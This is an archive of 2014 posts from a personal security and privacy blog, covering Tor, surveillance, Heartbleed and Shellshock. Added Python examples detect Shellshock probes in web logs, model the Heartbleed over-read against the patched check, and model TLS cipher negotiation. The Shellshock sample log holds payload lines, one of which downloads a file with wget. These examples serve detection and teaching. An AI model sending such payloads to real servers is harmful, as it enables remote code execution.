merry christmas 2014

As I have noted before, 24 December is trivia’s birthday. Since my first post dates from 24 December 2006, today is trivia’s eighth birthday. It seems like only yesterday.

I haven’t posted much in the last few months. I have a lot of material I need to cover, and a backlog of articles I want (or at least wanted) to write so I will endeavour to get back into a writing routine as soon as I can. Meanwhile, since it is yet again christmas time, and it’s trivia’s birthday, I couldn’t let today pass unblogged.

Let’s hope 2015 brings all that you wish for.

Best Wishes

Mick

Permanent link to this article: https://baldric.net/2014/12/24/merry-christmas-2014/

solidarity with the tor project

On Thursday 11 December, Roger Dingledine of the Tor project posted the following email to the “tor-talk” mail list (to which I am subscribed).

I’d like to draw your attention to

https://blog.torproject.org/blog/solidarity-against-online-harassment
https://twitter.com/torproject/status/543154161236586496

One of our colleagues has been the target of a sustained campaign of harassment for the past several months. We have decided to publish this statement to publicly declare our support for her, for every member of our organization, and for every member of our community who experiences this harassment. She is not alone and her experience has catalyzed us to action. This statement is a start.

Roger asked those who deplored on-line harassment (of any person, for any reason) and who supported the Tor project’s action in publicly condemning the harassment of one of the Tor developers to add their name and voice to the blog post.

I am proud to have done so.

Permanent link to this article: https://baldric.net/2014/12/13/solidarity-with-the-tor-project/

independent hit

On trying to reach the website of the Independent newspaper today (the Grauniad is trying my patience of late), I received the following response:

[Screenshot: www.independent.co.uk as rendered in Chromium]

Closing the popup takes you to this page:

[Screenshot: "Hacked by SEA" page as rendered in Chromium]

I haven’t checked whether this is simply a DNS redirect or an actual compromise of the Indy site, but however the graffiti was added, it indicates that the Indy has a problem.

Permanent link to this article: https://baldric.net/2014/11/27/independent-hit/

CVE-2014-6271 bash vulnerability

Guess what I found in trivia’s logs this morning?

89.207.135.125 - - [25/Sep/2014:10:48:13 +0100] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 345 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"

I’ll bet a lot of cgi scripts are being poked at the moment.

Check your logs guys. A simple grep ":;}" access.log will tell you all you need to know. (If you want a wider net, grep -F '() {' access.log instead: the ":;}" is only the most common function body, and the trigger is the "() {" function definition at the start of the header value, whatever follows it.)
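To put the grep on a firmer footing, here is a small scanner, added here as an example and not code from the original post, that parses combined-format access log lines, looks for the "() {" function definition in the two headers CGI hands to a script as environment variables (User-Agent and Referer), and pulls out the injected command. The sample log is constructed for the demo: the first line mirrors the probe quoted above, the rest use RFC 5737 test addresses; the third line is a variant with a different function body that a bare ":;}" grep misses.

```python
"""Scan combined-format web access logs for Shellshock (CVE-2014-6271)
probes.  Added example, not code from the original post; the sample log
lines are constructed for the demo (the first mirrors the probe quoted
above, the others use RFC 5737 test addresses)."""
import re

# Apache/nginx "combined" format:
#   ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# The trigger is a bash function definition "() {" at the start of an
# environment-variable value, followed by a trailing command that bash
# executes when it imports the variable.  The "{ :;}" body is merely the
# most common one, so match the definition rather than the ":;}" the post
# greps for.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;?\s*(?P<cmd>.*)$')

def naive_grep(lines):
    """The post's check: lines containing the literal ':;}'."""
    return [line for line in lines if ":;}" in line]

def find_probes(lines):
    """Return one record per log line whose referer or user-agent (both of
    which CGI passes to the script as environment variables) carries a
    Shellshock payload, with the injected command pulled out."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue            # not combined format; skip rather than guess
        parts = m.group("request").split(" ")
        path = parts[1] if len(parts) >= 2 else m.group("request")
        for field in ("agent", "referer"):
            s = SHELLSHOCK_RE.search(m.group(field))
            if s:
                hits.append({
                    "ip": m.group("ip"),
                    "time": m.group("time"),
                    "path": path,
                    "field": field,
                    "command": s.group("cmd").strip(),
                })
    return hits

# Constructed sample log.  Line 1 is the probe from the post; line 3 is a
# variant with a different function body that ':;}' grepping would miss.
SAMPLE_LOG = [
    '89.207.135.125 - - [25/Sep/2014:10:48:13 +0100] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 345 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"',
    '203.0.113.9 - - [25/Sep/2014:11:02:41 +0100] "GET /index.html HTTP/1.1" 200 4821 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/32.0"',
    '198.51.100.23 - - [25/Sep/2014:11:17:05 +0100] "GET /cgi-bin/test.cgi HTTP/1.0" 404 345 "-" "() { foo; }; wget http://198.51.100.23/x -O /tmp/x"',
    '198.51.100.77 - - [25/Sep/2014:11:30:59 +0100] "GET /cgi-bin/status HTTP/1.0" 404 345 "() { :;}; echo vulnerable" "curl/7.37.0"',
]

if __name__ == "__main__":
    print(f"naive ':;}}' grep matches {len(naive_grep(SAMPLE_LOG))} lines")
    for h in find_probes(SAMPLE_LOG):
        print(f"{h['ip']} -> {h['path']} via {h['field']}: {h['command']}")
```

Run against a real log with `find_probes(open("access.log"))`; the 404s in the sample are what you hope to see, since a 200 on a CGI path next to one of these headers means the script actually ran.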

(Update 27 September)

Digital Ocean, the company I use to host my Tor node and tails/whonix mirrors, has posted a useful note about the vulnerability. And John Leyden at El Reg posted about the problem here. Leyden’s article references some of the more authoritative discussions so I won’t repeat the links here.

All my systems were vulnerable, but of course have now been patched. However, the vulnerability has existed in bash for so long that I can’t help but feel deeply uneasy even though, as Michal Zalewski (aka lcamtuf) notes in his blog:

PS. As for the inevitable “why hasn’t this been noticed for 15 years” / “I bet the NSA knew about it” stuff – my take is that it’s a very unusual bug in a very obscure feature of a program that researchers don’t really look at, precisely because no reasonable person would expect it to fail this way. So, life goes on.

Permanent link to this article: https://baldric.net/2014/09/26/cve-2014-6271-bash-vulnerability/

net neutrality

My apologies that this is a few weeks late – but it still bears posting. John Oliver at HBO gave the best description of the net neutrality argument I have seen so far.

Following that broadcast, the FCC servers were, rather predictably, overwhelmed by the outraged response from the trolls that Oliver set loose.

Unfortunately, as John Naughton reports in the Observer, the FCC are unlikely to be moved by that.

Permanent link to this article: https://baldric.net/2014/08/13/net-neutrality/

levison on dime

Ladar Levison and Stephen Wyatt presented the upcoming Dark Internet Mail Environment (DIME) at Defcon22 this week. According to El Reg, Levison, who shut down Lavabit, his previous mail service, rather than comply with FBI demands that he divulge the private SSL keys used to encrypt traffic on that service, said:

“I’m not upset that I got railroaded and I had to shut down my business … I’m upset because we need a mil-spec cryptographic mail system for the entire planet just to be able to talk to our friends and family without any kind of fear of government surveillance”.

I think that puts the problem into perspective.

Permanent link to this article: https://baldric.net/2014/08/11/levison-on-dime/

punctuation matters

There is a nice tweet over at @NSA_PR. It reads:

We take your privacy, seriously.

Beyond parody.

Permanent link to this article: https://baldric.net/2014/07/28/punctuation-matters/

department of dirty

Like most ‘net users I get my fair share of spam. Most of it gets binned automatically by my email system, but of course some still gets through so I am used to hitting the delete button on random email from .ru domains offering me the opportunity to “impress my girl tonight”.

Most such phishing email relies on the recipient being dumb enough, naive enough, or (possibly) drunk enough to actually click through the link to the malicious website. I was therefore more than a little astonished at an email I received today from the open rights group. That email is given below in its entirety (I have obfuscated my email address for obvious reasons).


Permanent link to this article: https://baldric.net/2014/07/23/department-of-dirty/

drip

I get my domestic ADSL connectivity from the rather excellent people at Andrews and Arnold.

Here’s why. And this is the original reason I moved to them.

They also happily take (and similarly reply to) GPG encrypted support questions.

Good guys. Thoroughly recommended.

Now can you /really/ see BT doing any of that?

‘thought not.

Permanent link to this article: https://baldric.net/2014/07/21/drip/

inappropriate use of technology

I have been travelling a lot over the last few months (Czech Republic, Scotland, France, Germany, Austria, Slovenia, Croatia, Italy). That travel, plus my catching up on a load of reading is my excuse for the woeful lack of posts to trivia of late. But hey, sometimes life gets in the way of blogging – which is as it should be.

A couple of things struck me whilst I have been away though. Firstly, and most bizarrely I noticed a significant number of tourists in popular, and hugely photogenic, locations (such as Prague and Dubrovnik) wandering around staring at their smartphones rather than looking at the reality around them. At first I thought that they were just checking photographs they had taken, or possibly that they were texting or emailing friends and relatives about their holidays, or worse, posting to facebook, but that did not appear to be the case. Then by chance I overheard one tourist telling his partner that they needed to “turn left ahead” whilst they walked past me so it struck me that they might just possibly be using google maps to navigate. So I watched others more carefully. And I must conclude that many people were doing just that. I can’t help but feel a little saddened that someone should choose to stare at a google app on a small screen in their hand rather than look at the beauty of something like the Charles Bridge across the Vltava.

The second point which struck me was how much of a muppet you look if you use an iPad to take photographs.

Permanent link to this article: https://baldric.net/2014/06/30/inappropriate-use-of-technology/

a new app

My newspaper of choice, the Guardian, has for some time produced its own android (and iOS of course) app. I have often used the android app on my tablet to catch up on emerging news items at the end of the day. I also read the BBC news app for the same reason. Yesterday I received an update to the Guardian app. That update was a complete rewrite and gives the user a very different experience to the original app. For example, in the old app I could tailor the home screen to show me just the news categories I wanted (i.e. no sport, no fashion, but plenty of politics, business and UK news). In the new app I can only do that if I subscribe to a paid version. Sorry, but no, I already pay for the newspaper, I just want this to give me updated headlines, I don’t want to have to buy the newspaper all over again.

In today’s paper (and on-line of course) there is an editorial comment on the new app explaining its background. The writer opens:

Today I am proud to announce the launch of our redesigned Guardian app. It’s been a ground-up reworking to bring you a new, advanced and beautiful Guardian app. For the first time you will have a seamless experience across phones and tablets, with a cleaner, responsive design that showcases the Guardian’s award-winning journalism to our readers around the world.

The article goes on to explain the history of the original app and the thinking behind the redesign. It continues:

We’re also thrilled to announce that GuardianWitness – the Guardian’s award-winning platform through which readers can contribute their own pictures, videos and text – is now integrated into the app, meaning readers can now contribute to assignments seamlessly and directly within the main app.

Hmmmm.

It continues:

Other new features include:

  • A new flexible layout so we can display different stories in different ways, and show readers which stories are the most important in one glance
  • Breaking news and sport alerts and up-to-the-minute live coverage
  • Increased personalisation: readers can personalise their home screen depending on what topics they’re most interested in, and create notifications to follow favourite writers, stories, series and football teams
  • Improved photo galleries and inclusion of interactives for the first time
  • Off-line reading – with intelligent caching readers will now be able to save articles to read later and have more content at their fingertips wherever they are
  • Open journalism has been built into the app, with even easier ways for readers to contribute comments, videos, photos via our new GuardianWitness integration, as well as a better commenting experience
  • New opportunities for advertisers.

I particularly like that last bit.

And of course the app needs access to my location.

Right.

(P.S. The app called “UK Newspapers” by Markus Reitberger gives access to all the UK news sites you could want – and all it asks for is network access.)

Permanent link to this article: https://baldric.net/2014/05/30/a-new-app/

nsa operation orchestra

In February of this year, Poul-Henning Kamp (a.k.a “PHK”) gave what now looks to be a peculiarly prescient presentation as the closing keynote to 2014’s FOSDEM.

In the presentation (PDF), PHK posits an NSA operation called ORCHESTRA which is designed to undermine internet security through a series of “disinformation” or “misinformation”, or “misdirection” sub operations. ORCHESTRA is intended to be cheap, non-technical, completely deniable, but effective. One of the opening slides gives ORCHESTRA’s “operation at a glance” overview as:

* Objective:
– Reduce cost of COMINT collection
* Scope:
– All above board
– No special authorizations
* Means:
– Eliminate/reduce/prevent encryption
– Enable access
– Frustrate players

PHK delivers the presentation as if he were a mid-ranking NSA staffer intending to brief NATO in Brussels. But “being American, he ends up [at FOSDEM] instead”. The truly scary part of this presentation is that it could all be completely true.

What makes the presentation so timely is his commentary on openssl. Watch it and weep.

Permanent link to this article: https://baldric.net/2014/04/16/nsa-operation-orchestra/

more heartbleed

For any readers uncertain of exactly how the heartbleed vulnerability in openssl might be exploitable, Sean Cassidy over at existential type has a good explanation.

And if you find that difficult to follow, Randall Munroe over at xkcd covers it quite nicely.

heartbleed_explanation

My thanks, and appreciation as always, to a great artist.

Of course, Randall foresaw this problem back in 2008 when he published his take on the debian openssl fiasco.

Permanent link to this article: https://baldric.net/2014/04/16/more-heartbleed/

pulitzer guardian

The Guardian and the Washington Post have been jointly awarded the Pulitzer prize for public service for their reporting of Edward Snowden’s whistleblowing on the NSA’s surveillance activities.

The Guardian reports:

The Pulitzer committee praised the Guardian for its “revelation of widespread secret surveillance by the National Security Agency, helping through aggressive reporting to spark a debate about the relationship between the government and the public over issues of security and privacy”.

Unfortunately that debate seems to be taking place in the USA rather than in the UK.

In typical Guardian style, one correspondent to today’s letters page says:

Congratulations to all. Can’t wait for the film. All the President’s Men II? Johnny Depp as Alan Rusbridger?

I’d pay to see that. But I’m not sure how it ends yet.

Permanent link to this article: https://baldric.net/2014/04/16/pulitzer-guardian/

boot and nuke no more

I was contacted recently by a guy called Andy Beverley who wrote:

Hope you don’t mind me contacting you about one of your old blog posts “what gives with dban”. Thought I’d let you know that I forked DBAN a while ago, and produced a standalone program (called nwipe) that will run on any Linux OS. That means it will work with any Live CD, meaning much better hardware support.

It’s included in PartedMagic, as well as most other popular distros.

“No I don’t mind at all” is my response. In fact, since DBAN seems to be borked permanently, it is nice to see an alternative out there.

Andy’s nwipe page says that he could do with some assistance. So if anyone feels able to help him out, give him a call.

Permanent link to this article: https://baldric.net/2014/04/15/boot-and-nuke-no-more/

heartbleed

This is nasty. There is a remotely exploitable bug in openssl which leads to the leak of memory contents from the server to the client and from the client to the server. In practice this means that an attacker can read up to 64K of process memory on a vulnerable service for every malformed heartbeat request sent, and can repeat that request as often as they like, thus potentially exposing security critical information such as session data and private keys.
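To show where the 64K figure comes from, here is a model of the bug, added here as an example and not code from the post or from openssl. A bytearray stands in for process memory, a constructed string stands in for whatever key material happened to sit after the received record in the heap, and the two handlers reproduce the shape of the checks before and after the fix. The heartbeat message layout (RFC 6520) is a 1-byte type, a 2-byte payload_length, the payload, and at least 16 bytes of padding; the peer controls payload_length, and the unpatched code copied that many bytes back without checking it against the record actually received.

```python
"""Model of the OpenSSL heartbeat over-read (CVE-2014-0160).  Added example,
not code from the post or from OpenSSL: a bytearray stands in for process
memory, and the two handlers reproduce the shape of the pre- and post-patch
tls1_process_heartbeat checks.  RFC 6520 message layout: 1-byte type,
2-byte payload_length, payload, at least 16 bytes of padding."""
import struct

HB_REQUEST, HB_RESPONSE = 1, 2
PADDING = 16
HEADER = 1 + 2

# Constructed stand-in for whatever sits after the record in the heap.
SECRETS = b"-----BEGIN RSA PRIVATE KEY-----\nMIIEow...(constructed)\n"

def build_heartbeat(payload, claimed_len):
    """Heartbeat request whose payload_length field says claimed_len, however
    many payload bytes actually follow (the attacker controls both)."""
    return struct.pack("!BH", HB_REQUEST, claimed_len) + payload + b"\x00" * PADDING

def make_memory(record, tail=SECRETS):
    """'Process memory': the received record followed by unrelated heap data."""
    return bytearray(record + tail)

def vulnerable_heartbeat(memory, record_len):
    """Pre-patch: trust payload_length from the wire and copy that many bytes
    starting just after the header.  record_len is available but never used."""
    hbtype, payload_len = struct.unpack("!BH", bytes(memory[:HEADER]))
    if hbtype != HB_REQUEST:
        return None
    # memcpy(bp, pl, payload): reads past the record into adjacent memory.
    # (A real process keeps reading up to 64K; this model's memory just ends.)
    payload = bytes(memory[HEADER:HEADER + payload_len])
    return struct.pack("!BH", HB_RESPONSE, payload_len) + payload + b"\x00" * PADDING

def patched_heartbeat(memory, record_len):
    """Post-patch: silently discard any heartbeat whose declared payload does
    not fit inside the record actually received."""
    if record_len < HEADER + PADDING:
        return None                      # too short to be a valid heartbeat
    hbtype, payload_len = struct.unpack("!BH", bytes(memory[:HEADER]))
    if hbtype != HB_REQUEST:
        return None
    if HEADER + payload_len + PADDING > record_len:
        return None                      # the bounds check the fix added
    payload = bytes(memory[HEADER:HEADER + payload_len])
    return struct.pack("!BH", HB_RESPONSE, payload_len) + payload + b"\x00" * PADDING

def over_read(response, sent_payload):
    """Bytes in the response payload beyond what the peer actually sent."""
    if response is None:
        return b""
    _, n = struct.unpack("!BH", response[:HEADER])
    return response[HEADER:HEADER + n][len(sent_payload):]

def run(sent_payload, claimed_len):
    """Feed the same crafted heartbeat to both handlers."""
    record = build_heartbeat(sent_payload, claimed_len)
    memory = make_memory(record)
    return (vulnerable_heartbeat(memory, len(record)),
            patched_heartbeat(memory, len(record)))

if __name__ == "__main__":
    honest_v, honest_p = run(b"hat", 3)
    leaky_v, leaky_p = run(b"hat", 0xFFFF)
    print("honest request, both handlers agree:", honest_v == honest_p)
    print("crafted request, vulnerable handler leaks:", over_read(leaky_v, b"hat"))
    print("crafted request, patched handler replies:", leaky_p)
```

The two-byte length field is why the ceiling is 64K per request, and nothing in the protocol stops the peer sending the next request straight away.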

At 19.00 UTC yesterday, openssl bug CVE-2014-0160 was announced at heartbleed.com. I picked it up following a flurry of emails on the tor relays list this morning. Roger Dingledine posted a blog commentary on the bug to the tor list giving details about the likely impacts on Tor and Tor users.


Permanent link to this article: https://baldric.net/2014/04/08/heartbleed/

the netbook is not dead

I bought my first netbook, the Acer Aspire One, back in April 2009 – five years ago. That machine is still going strong and has seen umpteen different distros in its time. It currently runs Mint 16, and very happily too.

The little Acer has nothing on it that I value over much, all my important data is stored on my desktop (and backed up appropriately) but I find it useful as a “walking about” tool simply because it is so portable, so it still gets quite a bit of use. I am planning a few trips later this year, notably to Scotland and later (by bike) to Croatia, and I want to take something with me that will give me more flexibility in my connectivity options than simply taking my phone to collect email. In particular, it would be really useful if I could connect back to my home VPN endpoint whilst I am out and about. This is exactly the sort of thing I use the Acer for when I’m in the UK. I (briefly) considered using my Galaxy Tab, which is even lighter and more portable than the Acer, but I just don’t trust Android enough to load my openvpn certificates on to it. There is also the possibility that the Tablet could be lost or stolen (I shall be camping quite a lot). So the Acer looks a good bet. The downside of taking the Acer is the need for mains power (for recharging) of course, but I shall be staying in the odd hotel en route, and I have an apartment booked in Dubrovnik so I figure it should cope. However, I am not the only fan of the Acer – my grandson loves to sit with it on his lap in my study and watch Pingu and Octonauts (parents and grandparents of small children will understand). Given that I recognise that I might lose the Tablet, I must also assume that the Acer might disappear. My grandson wouldn’t like that. So the obvious solution is to take another AAO with me – off to ebay then.

Since my AAO is five years old, and that model has been around for longer than that, I figured I could pick up an early ZG5 with 8 or 16 Gig SSD (rather than the 160 Gig disk mine has) for about £20 – £30. Hell, I’ve bought better specced Dell laptops (I know, I know) for less than that fairly recently. I was wrong. Astonishingly, the ZG5, in all its variants, appears to still be in huge demand. I bid on a few models and lost, by quite some margin. So I set up a watch list of likely looking candidates and waited a few days to get a feel for the prices being paid. The lowest price paid was £37.00 (plus £10.00 P&P) for a very early ZG5 still running Linpus, another Linpus ZG5 with only 512Mb of RAM and an 8 Gig SSD went for £50.00 (plus £9.00 P&P), most of the later models (with 1 Gig of RAM and 160 – 250 Gig disks) went for around £70 – £90 (plus various P&P charges). In all I watched 20 different auctions (plus a few for similar devices such as the MSI Wind and the Samsung NC10). The lowest price I saw after the £37.00 device was £55.00 and the highest was £103.00 with a mean of just over £67. That is astonishing when you consider that you can pick up a new generic 7″ Android tablet for around £70.00 and you can get a decent branded one for just over £100. And as I said, old laptops go for silly money – just take a look at ebay or gumtree and you can pick up job lots of half a dozen or more for loose change.

So – despite what all the pundits may have said, clearly the netbook as a concept still meets the requirements of enough people (like me I guess) to keep the market buoyant. Intriguingly, the most popular machines sold (in terms of numbers of bidders) were all running XP. I just hope the buyers intended to do as I did and wipe them to install a linux distro. Of course, having started the search for another ZG5, I just couldn’t let it go without buying one. I was eventually successful on a good one with the same specification as my original model.

The only drawback is that it is not blue…..

[Photo: the new Acer, open]

[Photo: the new Acer, closed]

Well, at least I don’t think it will be stolen.

Permanent link to this article: https://baldric.net/2014/03/31/the-netbook-is-not-dead/

the spy in your bathroom

Back in June 2008 I noted Craig Wright had posted to bugtraq reporting a “remote exploitation of an information disclosure vulnerability in Oral B’s SmartGuide management system”. I found it faintly amusing that a security researcher should have been looking for vulnerabilities in a toothbrush.

I should have known better.

A report in wednesday’s on-line Guardian points to the release of a new smart toothbrush from Oral B. Apparently that toothbrush will link via bluetooth to an app on either an iPhone or Android and report back to your dentist. It seems that Oral B “sees the connected toothbrush, launched as part of Mobile World Congress’s Connected City exhibition, as the next evolution of the smart bathroom.” Wayne Randall, global vice president of Oral Care at Procter and Gamble reportedly said:

“It provides the highest degree of user interaction to track your oral care habits to help improve your oral health, and we believe it will have significant impact on the future of personal oral care, providing data-based solutions for oral health, and making the relationship between dental professionals and patients a more collaborative one.”

That’s just great. GCHQ have plenty of other personal data feeds already without giving them access to our bathrooms.

Permanent link to this article: https://baldric.net/2014/02/28/the-spy-in-your-bathroom/

checking client-side ssl/tls

At the tail end of last year I mentioned a couple of tools I had used in my testing of SSL/TLS certificates used for trivia itself and my mail server. However, that post concentrated on the server side certificates and ignored the security, or otherwise, offered by the browser’s configuration. It is important to know the client side capability because without proper support there for the more secure ciphers it is pointless the server offering them in the handshake. The server can only choose from the cipher suites and protocol versions the client puts on the table, so the two sides settle on the best they have in common, and if the client’s list is weak that common ground will be sub-optimal however well the server is configured.

A recent post to the Tor stackexchange site posed a question about the client side security offered by the TorBrowser Bundle v. 3.5 (which uses Firefox). The questioner had used the “howsmyssl” site to check the cipher suites which would be used by firefox in a TLS/SSL exchange and been disturbed to discover that it reportedly offered an insecure cipher (SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA). Sam Whited responded with a pointer to his blog post about improving FF’s use of TLS.

From that post, it appears that TLS 1.1 and 1.2 were off by default in FF versions prior to 27. Hence they would have been off in the TorBrowser Bundle as well.
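The two points above (the server can only pick from what the client offers, and an old Firefox would not offer TLS 1.1 or 1.2 at all) can be made concrete with a small model, added here as an example and not code from the post, from howsmyssl or from the Tor project. It models server-preference cipher suite selection and version negotiation on constructed suite lists (OpenSSL-style names, plus the NSS-style FIPS 3DES suite name the questioner saw, matched by substring), and finishes with an offline look at what the local Python/OpenSSL client would itself offer, which depends on whatever OpenSSL build is installed.

```python
"""Client-side TLS capability: a model of suite/version negotiation (why a
weak client offer caps the outcome whatever the server supports) and an
offline look at what this machine's own Python/OpenSSL client would offer.
Added example, not code from the post, howsmyssl or Tor; the suite lists
are constructed (OpenSSL-style names, plus the NSS-style FIPS 3DES suite
the post mentions, matched by substring)."""
import ssl

# Substrings that mark a suite as one a client should not offer, with why.
WEAK_MARKERS = {
    "3DES": "64-bit block cipher",
    "DES-CBC3": "64-bit block cipher",
    "DES-CBC-": "single DES",
    "RC4": "broken stream cipher",
    "NULL": "no encryption or no authentication",
    "EXP": "export-grade key length",
    "MD5": "MD5-based MAC",
}

def weak_reasons(suite):
    """Sorted list of reasons the named suite is weak (empty if none found)."""
    up = suite.upper()
    return sorted({why for marker, why in WEAK_MARKERS.items() if marker in up})

def negotiate_suite(client_offer, server_prefs):
    """Server-preference negotiation: the first suite in the server's order that
    the client also offered.  The server can never pick something the client
    left out, so a client that only offers weak suites gets a weak suite."""
    offered = set(client_offer)
    return next((s for s in server_prefs if s in offered), None)

def negotiate_version(client_max, server_min, server_max):
    """Highest protocol version both sides accept, or None if they cannot agree.
    Versions are (major, minor) tuples: TLS 1.0 = (1, 0), TLS 1.2 = (1, 2)."""
    agreed = min(client_max, server_max)
    return agreed if agreed >= server_min else None

def audit_offer(client_offer, client_max, server_prefs, server_min, server_max):
    """One-shot view of what a handshake between the two configs would yield."""
    suite = negotiate_suite(client_offer, server_prefs)
    return {
        "version": negotiate_version(client_max, server_min, server_max),
        "suite": suite,
        "suite_weaknesses": weak_reasons(suite) if suite else [],
    }

def local_client_offer():
    """Suites this interpreter's default client context would offer, and which
    of them the markers above flag.  Depends on the local OpenSSL build."""
    names = [c["name"] for c in ssl.create_default_context().get_ciphers()]
    return names, {n: weak_reasons(n) for n in names if weak_reasons(n)}

# Constructed configurations.
SERVER_PREFS = ["ECDHE-RSA-AES256-GCM-SHA384", "ECDHE-RSA-AES128-GCM-SHA256",
                "ECDHE-RSA-AES128-SHA", "AES128-SHA", "DES-CBC3-SHA"]
OLD_FIREFOX_OFFER = ["AES128-SHA", "DES-CBC3-SHA", "SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA"]
OLD_FIREFOX_MAX = (1, 0)          # TLS 1.1/1.2 off by default before FF 27
WEAK_ONLY_OFFER = ["DES-CBC3-SHA", "SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA"]
MODERN_OFFER = ["ECDHE-RSA-AES256-GCM-SHA384", "ECDHE-RSA-AES128-GCM-SHA256"]

if __name__ == "__main__":
    print(audit_offer(OLD_FIREFOX_OFFER, OLD_FIREFOX_MAX, SERVER_PREFS, (1, 0), (1, 2)))
    print(audit_offer(WEAK_ONLY_OFFER, OLD_FIREFOX_MAX, SERVER_PREFS, (1, 0), (1, 2)))
    print(audit_offer(MODERN_OFFER, (1, 2), SERVER_PREFS, (1, 0), (1, 2)))
    names, flagged = local_client_offer()
    print(f"local client offers {len(names)} suites; flagged: {flagged or 'none'}")
```

The first audit shows the old-Firefox case: the suite is fine but the version is capped at TLS 1.0 by the client, not the server. The second shows the pure downgrade: a server whose top preference is AES-GCM still ends up on 3DES because that is all the client brought.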

Permanent link to this article: https://baldric.net/2014/02/12/checking-client-side-ssltls/

policy update

An exchange of emails with Mark over at bsdbox.co a day or so ago made me realise that my privacy policy needed updating. Not, I hasten to add, for any fundamental reason, but simply because a couple of the references in that policy were out of date. I have therefore amended it and version 0.2.0 is now in place. As promised in the policy, this post draws attention to the changes.

The amendments I have made are as follows:

I have amended my reference to geo-locating IP addresses because I stopped using the off-site “clustrmaps” tool some time ago. I now point out that I collect aggregate IP address geo-location data incidentally through my use of Counterize. However, as I note in the policy, I may drop Counterize shortly because it is becoming a drain on the site. Unlike static web log analysis tools, Counterize runs a script in real time to update its database. That database is now getting too large for my liking and some of the (automatic) queries it runs are not well optimised. I haven’t spent much time investigating this, largely because my MySQL DB skills are woefully inadequate, but it looks to me as if some of the fields are not properly indexed to allow fast queries.

As an aside, readers may care to note that Counterize reports that I get between 30,000 and 40,000 hits on trivia each month and the top visiting countries are: the US at 57.8%, China at 13.6%, the EU at 6.8% and the Russian Federation at 4.5%. The dear old UK is eighth at 2.4% just ahead of Canada and the Ukraine. Those stats might look odd until you realise that I have allowed Counterize to include known webcrawlers. The biggest of these of course are based in the US, but Baidu in China is not far behind in its activity.

I have changed my references to the captcha and contact forms I use on trivia because I have stopped using Mike Challis’s plugins. I did this because Mike seems to like to update his plugins every other week or so and, much as that is to be applauded if there are real gains to be made, I found the maintenance overhead to be too high for what I was getting. Stability is good too.

Incidentally, for anyone interested in FreeBSD, particularly in its use on a server running Tor, or a website it is well worth paying a visit to Mark’s blog. He writes well and it is always worth looking at alternatives to Linux.

Permanent link to this article: https://baldric.net/2014/02/12/policy-update/

privacy matters

The Open Rights Group here in the UK has been campaigning against mass, unwarranted surveillance by GCHQ since the Snowden revelations first emerged in summer of last year. Two of its current campaigns are: “don’t spy on us” and “the day we fight back”.

I have signed both of them.

I have also written to my MP in the following terms:

I have today signed the on-line petition for the “don’t spy on us” campaign. That campaign calls for an inquiry into the mass, unwarranted, surveillance of the UK population by GCHQ.

I call upon you, as my elected representative, to support my rights under Article 8 and 10 of the European Convention on Human Rights to a private life with full, unfettered freedom of expression.

I ask that you support the campaign both on-line, and in Parliament. Parliament has been completely ineffective in its oversight of GCHQ. That must end. You, along with all other Parliamentarians must do a much better job of holding them to account.

Yours sincerely

Mick Morgan

I’ll let you know what he says (though I can guess the reply. In fact I could probably write it myself.)

Permanent link to this article: https://baldric.net/2014/02/11/privacy-matters/

compare and contrast

Foreign Secretary William Hague is apparently concerned about press restrictions in Egypt. He has reportedly urged the interim Egyptian government to demonstrate commitment to free expression.

The press release on the gov.uk website says:

Speaking today about increasing restrictions placed upon journalists and the media in Egypt, Foreign Secretary William Hague said:

  • “I am very concerned by restrictions on freedom of the press in Egypt, including reports of the recent charging of Al Jazeera journalists, two of whom are British, Sue Turton and Dominic Kane.
  • “We have raised our concerns about these cases and freedom of expression at a senior level with the Egyptian government in recent days. I will discuss these concerns with other European Foreign Ministers at the European Foreign Affairs Council on Monday, and we will continue to monitor the situation of the journalists very closely, and raise them with the Egyptian authorities.
  • “The UK believes a free and robust press is the bedrock of democracy. I urge the Egyptian interim government to demonstrate its commitment to an inclusive political process which allows for full freedom of expression and for journalists to operate without the fear of persecution.”

So, the UK Government believes that a “free and robust press is the bedrock of democracy”.

I agree.

Last weekend’s Guardian newspaper reported on the visits they had from and the conversations they had with Cabinet Secretary, Sir Jeremy Heywood and colleagues back in June and July of last year when the Snowden revelations were just starting to cause some ripples.

That article says:

In two tense meetings last June and July the cabinet secretary, Jeremy Heywood, explicitly warned the Guardian’s editor, Alan Rusbridger, to return the Snowden documents.

Heywood, sent personally by David Cameron, told the editor to stop publishing articles based on leaked material from America’s National Security Agency and GCHQ. At one point Heywood said: “We can do this nicely or we can go to law”. He added: “A lot of people in government think you should be closed down.”

It goes on:

Days later Oliver Robbins, the prime minister’s deputy national security adviser, renewed the threat of legal action. “If you won’t return it [the Snowden material] we will have to talk to ‘other people’ this evening.” Asked if Downing Street really intended to close down the Guardian if it did not comply, Robbins confirmed: “I’m saying this.”

Perhaps Hague should have a word with Cameron. They really need to be more consistent. If freedom of expression is vital in Egypt, I submit it is equally vital in the UK.

Permanent link to this article: https://baldric.net/2014/02/08/compare-and-contrast/

dis-unity

The “cloud” is achingly trendy at the moment and new companies offering some-bollocks-as-a-service (SBaaS) keep popping up all over the ‘net. Personally I am extremely unlikely to use any of the services I have seen, I just don’t trust that particular business model.

I checked out the website for one of these companies today following an article I read on El Reg. The company’s website says, in answer to its own question, “what can you do with younity?” that you can:

Spontaneously access any file, from any device, without planning ahead.

Browse all your devices at once.

It further says:

share any file.
ANY FILE STORED ON ANY COMPUTER WITHOUT PLANNING AHEAD, VIA YOUNITY OR PRIVATELY TO FACEBOOK.

(I love that “privately to facebook” bit.)

